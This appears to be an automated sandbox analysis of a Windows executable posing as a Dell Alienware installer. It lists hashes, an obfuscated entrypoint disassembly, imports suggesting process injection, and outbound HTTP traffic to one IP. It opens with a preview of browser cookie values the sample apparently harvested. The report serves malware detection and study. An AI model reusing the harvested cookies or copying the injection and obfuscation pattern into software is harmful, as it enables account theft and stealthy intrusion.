                                                                                                                                                                        Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.745694560857276
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:fnhcdXEfus.exe
                                                                                                                                                                        File size:4453376
                                                                                                                                                                        MD5:18169f98e39ae228d131aec477c8a2e9
                                                                                                                                                                        SHA1:c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
                                                                                                                                                                        SHA256:344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
                                                                                                                                                                        SHA512:8deaca50e918252ba85715c85096e810733a9512c656fa40ad71e22437cc8f74d1965468592929a4b1216d33da598c308b312f5c1aa770f62959c873a4582efb
                                                                                                                                                                        SSDEEP:98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ
                                                                                                                                                                        File Content Preview:MZ......................@.............................................d....L.!This program cannot be run in DOS mode....$..............Z...Z...Zw]qZ...Zw]lZ...Z$\oZ...Z$\lZZ..Z)..Z...Z$\mZ...Z)..Z...Z...Zu..Zw]mZ...Zw]kZ...Z..5Z...Zw]nZ...ZRich...Z.......

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:497971328ce1634d

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x44523a
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                        Time Stamp:0x5BA39B6E [Thu Sep 20 13:06:54 2018 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                        File Version Major:5
                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                        Import Hash:d91a0a44f8762e656db1be8576dd54b2

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub ebp, 18h
                                                                                                                                                                        mov dword ptr [ebp-14h], 0044523Ah
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0FA2h
                                                                                                                                                                        inc esi
                                                                                                                                                                        mov ecx, dword ptr [esp]
                                                                                                                                                                        add eax, edx
                                                                                                                                                                        mov ecx, dword ptr [esp]
                                                                                                                                                                        mov ecx, dword ptr [ecx]
                                                                                                                                                                        call ebp
                                                                                                                                                                        mov edx, esi
                                                                                                                                                                        pop edx
                                                                                                                                                                        popad
                                                                                                                                                                        push 00000003h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Dh
                                                                                                                                                                        mov edx, ebx
                                                                                                                                                                        mov edi, ebp
                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                        mov eax, dword ptr [esp]
                                                                                                                                                                        mov eax, ecx
                                                                                                                                                                        popad
                                                                                                                                                                        mov eax, 004455BCh
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0FA4h
                                                                                                                                                                        mov edx, dword ptr [ecx]
                                                                                                                                                                        push ebx
                                                                                                                                                                        mov eax, dword ptr [esp]
                                                                                                                                                                        dec ebx
                                                                                                                                                                        mov esi, edi
                                                                                                                                                                        pushad
                                                                                                                                                                        mov ebx, ecx
                                                                                                                                                                        inc dword ptr [ecx]
                                                                                                                                                                        idiv eax
                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                        popad
                                                                                                                                                                        push eax
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Fh
                                                                                                                                                                        pop edi
                                                                                                                                                                        inc ecx
                                                                                                                                                                        mov ebp, ecx
                                                                                                                                                                        mov ecx, esp
                                                                                                                                                                        cmp eax, edx
                                                                                                                                                                        imul eax, edx
                                                                                                                                                                        mov esp, esi
                                                                                                                                                                        popad
                                                                                                                                                                        push 000013C5h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Fh
                                                                                                                                                                        dec edx
                                                                                                                                                                        mov ecx, edi
                                                                                                                                                                        popad
                                                                                                                                                                        mov esi, ebx
                                                                                                                                                                        push eax
                                                                                                                                                                        call esp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        idiv eax
                                                                                                                                                                        popad
                                                                                                                                                                        push 00445DF0h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 00000000h

                                                                                                                                                                        Rich Headers

                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [RES] VS2012 UPD1 build 51106
                                                                                                                                                                        • [C++] VS2012 UPD1 build 51106
                                                                                                                                                                        • [ C ] VS2012 UPD1 build 51106
                                                                                                                                                                        • [LNK] VS2012 UPD1 build 51106

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9abd00xdc.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x498ec.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf20000x8454.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x768a00x38.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x877100x40.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x760000x4f4.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x9a5b40xe0.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x744970x74600False0.513208243824data6.58470653969IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x760000x2662a0x26800False0.360135957792data4.65071874944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x9d0000xa9700x2400False0.295789930556data4.48877485279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0xa80000x498ec0x49a00False0.341989203098data6.45902686047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0xf20000x1f3b60x1f400False0.0011484375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                        GIF0xa8db40x339fGIF image data, version 89a, 350 x 624EnglishUnited States
                                                                                                                                                                        PNG0xac1540x39edPNG image data, 360 x 150, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        PNG0xafb440x2fc9PNG image data, 240 x 227, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        RT_BITMAP0xb2b100x14220data
                                                                                                                                                                        RT_BITMAP0xc6d300x1b5cdata
                                                                                                                                                                        RT_BITMAP0xc888c0x38e4data
                                                                                                                                                                        RT_BITMAP0xcc1700x1238data
                                                                                                                                                                        RT_BITMAP0xcd3a80x6588data
                                                                                                                                                                        RT_BITMAP0xd39300x11f88data
                                                                                                                                                                        RT_ICON0xe58b80x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                        RT_ICON0xe5d200x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4289178028, next used block 4289178028
                                                                                                                                                                        RT_ICON0xe6dc80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4289178028, next used block 4289178028
                                                                                                                                                                        RT_ICON0xe93700x2e8data
                                                                                                                                                                        RT_ICON0xe96580x2e8data
                                                                                                                                                                        RT_DIALOG0xe99400x1cedata
                                                                                                                                                                        RT_DIALOG0xe9b100x266data
                                                                                                                                                                        RT_DIALOG0xe9d780x2b0data
                                                                                                                                                                        RT_DIALOG0xea0280x54data
                                                                                                                                                                        RT_DIALOG0xea07c0x34data
                                                                                                                                                                        RT_DIALOG0xea0b00xd6data
                                                                                                                                                                        RT_DIALOG0xea1880x114data
                                                                                                                                                                        RT_DIALOG0xea29c0xd6data
                                                                                                                                                                        RT_DIALOG0xea3740x246data
                                                                                                                                                                        RT_DIALOG0xea5bc0x3c8data
                                                                                                                                                                        RT_DIALOG0xea9840x14edata
                                                                                                                                                                        RT_DIALOG0xeaad40x1e8data
                                                                                                                                                                        RT_DIALOG0xeacbc0x1c6data
                                                                                                                                                                        RT_DIALOG0xeae840x1eedata
                                                                                                                                                                        RT_DIALOG0xeb0740x7cdata
                                                                                                                                                                        RT_DIALOG0xeb0f00x3bcdata
                                                                                                                                                                        RT_DIALOG0xeb4ac0x158data
                                                                                                                                                                        RT_DIALOG0xeb6040x1dadata
                                                                                                                                                                        RT_DIALOG0xeb7e00x10adata
                                                                                                                                                                        RT_DIALOG0xeb8ec0xdedata
                                                                                                                                                                        RT_DIALOG0xeb9cc0x1d4data
                                                                                                                                                                        RT_DIALOG0xebba00x1dcdata
                                                                                                                                                                        RT_DIALOG0xebd7c0x294data
                                                                                                                                                                        RT_STRING0xec0100x160dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec1700x23edataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec3b00x378dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec7280x252dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xec97c0x1f4dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xecb700x66adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xed1dc0x366dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xed5440x27edataEnglishUnited States
                                                                                                                                                                        RT_STRING0xed7c40x518dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xedcdc0x882dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xee5600x23edataEnglishUnited States
                                                                                                                                                                        RT_STRING0xee7a00x3badataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeeb5c0x12cdataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeec880x4adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeecd40xdadataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeedb00x110dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xeeec00x20adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef0cc0xbadataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef1880xa8dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef2300x12adataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef35c0x422dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xef7800x5c2dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xefd440x40dataEnglishUnited States
                                                                                                                                                                        RT_STRING0xefd840xcaadataEnglishUnited States
                                                                                                                                                                        RT_STRING0xf0a300x284dataEnglishUnited States
                                                                                                                                                                        RT_GROUP_ICON0xf0cb40x30data
                                                                                                                                                                        RT_GROUP_ICON0xf0ce40x14data
                                                                                                                                                                        RT_GROUP_ICON0xf0cf80x14data
                                                                                                                                                                        RT_VERSION0xf0d0c0x428data
                                                                                                                                                                        RT_MANIFEST0xf11340x535XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        RT_MANIFEST0xf166c0x280XML 1.0 document textEnglishUnited States

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        COMCTL32.dll
                                                                                                                                                                        KERNEL32.dllLoadLibraryW, lstrcmpW, lstrcmpiW, GetSystemDefaultLangID, GetUserDefaultLangID, VerLanguageNameW, CompareFileTime, CreateDirectoryW, FindClose, FindFirstFileW, FindNextFileW, SetFileAttributesW, GetSystemTimeAsFileTime, GetPrivateProfileStringW, MoveFileW, LocalFree, FormatMessageW, GetSystemInfo, MulDiv, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LoadLibraryExW, GetVersion, GetLocalTime, IsValidLocale, GetCommandLineW, GetFileAttributesW, GlobalAlloc, GlobalFree, FlushFileBuffers, VirtualQuery, IsBadReadPtr, GetDiskFreeSpaceExW, GetDriveTypeW, GetExitCodeProcess, GetCurrentThread, GetLocaleInfoW, InterlockedExchange, LoadLibraryExA, GetModuleHandleW, GetProcAddress, GetSystemDirectoryA, LoadLibraryA, GetLastError, SetLastError, CreateFileW, GetFileSize, CloseHandle, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, lstrlenA, MultiByteToWideChar, WideCharToMultiByte, ReadFile, SetFilePointer, WriteFile, HeapAlloc, lstrcmpA, SystemTimeToFileTime, ResetEvent, SetEvent, FindResourceExW, OpenProcess, GetProcessTimes, ReadConsoleW, WriteConsoleW, SetStdHandle, GetCurrentDirectoryW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, GetTimeFormatW, GetDateFormatW, OutputDebugStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetFileType, HeapReAlloc, GetStartupInfoW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeLibrary, CompareStringA, CompareStringW, lstrcatW, GetVersionExW, InterlockedDecrement, InterlockedIncrement, CreateEventW, QueryPerformanceFrequency, GetTempFileNameW, CopyFileW, GetTickCount, GetExitCodeThread, CreateThread, FindResourceW, GlobalUnlock, GlobalLock, SizeofResource, LockResource, LoadResource, lstrcpyW, SetErrorMode, GetTempPathW, ExpandEnvironmentStringsW, MoveFileExW, WriteProcessMemory, VirtualProtectEx, GetWindowsDirectoryW, GetSystemDirectoryW, FlushInstructionCache, SetThreadContext, GetThreadContext, CreateProcessW, ResumeThread, TerminateProcess, ExitProcess, GetCurrentProcess, Sleep, WaitForSingleObject, DuplicateHandle, RemoveDirectoryW, DeleteFileW, SetCurrentDirectoryW, lstrlenW, lstrcpynW, GetModuleFileNameW, GetProcessHeap, HeapFree, GetStringTypeW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetCurrentThreadId, HeapSize, GetModuleHandleExW, GetStdHandle, GetFullPathNameW, IsProcessorFeaturePresent, IsDebuggerPresent, RtlUnwind, LCMapStringW, DecodePointer, EncodePointer
                                                                                                                                                                        USER32.dllDefWindowProcW, PostMessageW, DispatchMessageW, TranslateMessage, GetMessageW, RegisterClassW, PostQuitMessage, CharPrevW, SendDlgItemMessageW, wvsprintfW, LoadImageW, CreateDialogParamW, MoveWindow, SetCursor, GetWindow, GetDlgItemTextW, SetFocus, EnableWindow, SetForegroundWindow, SetActiveWindow, SetDlgItemTextW, IsDialogMessageW, FindWindowW, SubtractRect, IntersectRect, SetRect, FillRect, GetSysColorBrush, GetSysColor, GetWindowRect, GetDC, GetSystemMetrics, GetDlgCtrlID, CreateDialogIndirectParamW, DestroyWindow, IsWindow, SendMessageW, MessageBoxW, CharNextW, WaitForInputIdle, SetWindowLongW, GetWindowLongW, GetClientRect, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, SetWindowPos, SetWindowTextW, GetDlgItem, ExitWindowsEx, CharUpperW, EndDialog, DialogBoxIndirectParamW, ShowWindow, GetDesktopWindow, MsgWaitForMultipleObjects, PeekMessageW, wsprintfW, LoadIconW, LoadCursorW, KillTimer, SetTimer, CreateWindowExW
                                                                                                                                                                        GDI32.dllTranslateCharsetInfo, UnrealizeObject, CreateHalftonePalette, GetDIBColorTable, SelectPalette, RealizePalette, GetSystemPaletteEntries, CreatePalette, CreateFontW, GetObjectW, SetTextColor, SetBkMode, GetDeviceCaps, CreateSolidBrush, CreateFontIndirectW, SetStretchBltMode, StretchBlt, SelectObject, DeleteDC, CreateDIBitmap, CreateCompatibleDC, BitBlt, DeleteObject, GetStockObject
                                                                                                                                                                        ADVAPI32.dllGetTokenInformation, RegOpenKeyExW, RegOpenKeyW, RegOverridePredefKey, LookupPrivilegeValueW, AdjustTokenPrivileges, RegCloseKey, FreeSid, EqualSid, AllocateAndInitializeSid, OpenThreadToken, OpenProcessToken, SetEntriesInAclW, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateWellKnownSid, RegQueryInfoKeyW, RegEnumKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegCreateKeyExW, RegDeleteValueW, RegQueryValueExW
                                                                                                                                                                        SHELL32.dllSHGetMalloc, ShellExecuteExW, SHGetPathFromIDListW, SHGetFolderPathW, SHBrowseForFolderW, ShellExecuteW, CommandLineToArgvW
                                                                                                                                                                        ole32.dllCoCreateInstance, CoCreateGuid, CLSIDFromProgID, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoInitializeSecurity, CoUninitialize
                                                                                                                                                                        OLEAUT32.dllUnRegisterTypeLib, RegisterTypeLib, SysAllocStringLen, SysFreeString, SysReAllocStringLen, SysStringLen, SysAllocString, SysStringByteLen, SysAllocStringByteLen, VarBstrCat, VarBstrFromDate, VariantClear, VariantChangeType, GetErrorInfo, VarUI4FromStr, SystemTimeToVariantTime, LoadTypeLib
                                                                                                                                                                        SHLWAPI.dllPathFileExistsW
                                                                                                                                                                        RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW

                                                                                                                                                                        Version Infos

                                                                                                                                                                        DescriptionData
                                                                                                                                                                        LegalCopyrightCopyright (c) 2018 Flexera. All Rights Reserved.
                                                                                                                                                                        ISInternalVersion24.0.573
                                                                                                                                                                        InternalNameSetup
                                                                                                                                                                        FileVersion5.2.33.0
                                                                                                                                                                        CompanyNameDell Inc
                                                                                                                                                                        Internal Build Number185990
                                                                                                                                                                        ProductNameAlienware Command Center Suite
                                                                                                                                                                        ProductVersion5.2.33.0
                                                                                                                                                                        FileDescriptionSetup Launcher Unicode
                                                                                                                                                                        ISInternalDescriptionSetup Launcher Unicode
                                                                                                                                                                        OriginalFilenameInstallShield Setup.exe
                                                                                                                                                                        Translation0x0409 0x04b0

                                                                                                                                                                        Possible Origin

                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jan 30, 2021 14:31:11.635849953 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:11.823514938 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:11.823671103 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:11.824554920 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:11.824605942 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:12.012116909 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.012165070 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.335077047 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.365892887 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:12.365950108 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:12.553586006 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:12.553599119 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:13.742291927 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:13.787702084 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:13.833859921 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:13.833919048 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:14.022130966 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:14.022171021 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:17.383786917 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:17.428641081 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:19.318113089 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:19.318176031 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:19.505898952 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:19.505939007 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:22.825290918 CET804971934.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:22.913503885 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.540046930 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.727830887 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:25.727924109 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.730926037 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.731009007 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:25.920118093 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:25.920156956 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:26.497304916 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.686372995 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:26.686577082 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.687041998 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.687155962 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:26.877455950 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:26.877482891 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:27.603024960 CET4971980192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:30.286595106 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:30.414025068 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:32.487735033 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:32.726711035 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:33.553212881 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:33.553366899 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:33.742155075 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:33.742188931 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:37.934276104 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:37.934351921 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:38.112478018 CET804972334.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:38.123282909 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:38.123300076 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:38.228832006 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:39.173599005 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:39.186463118 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:39.186546087 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:39.374016047 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:39.374053955 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:41.303073883 CET4972380192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.455353975 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:43.545784950 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.785324097 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.785418987 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:43.972913027 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:43.972959042 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:45.013859987 CET804972234.94.64.66192.168.2.3
                                                                                                                                                                        Jan 30, 2021 14:31:45.142966032 CET4972280192.168.2.334.94.64.66
                                                                                                                                                                        Jan 30, 2021 14:31:45.143001080 CET4972280192.168.2.334.94.64.66
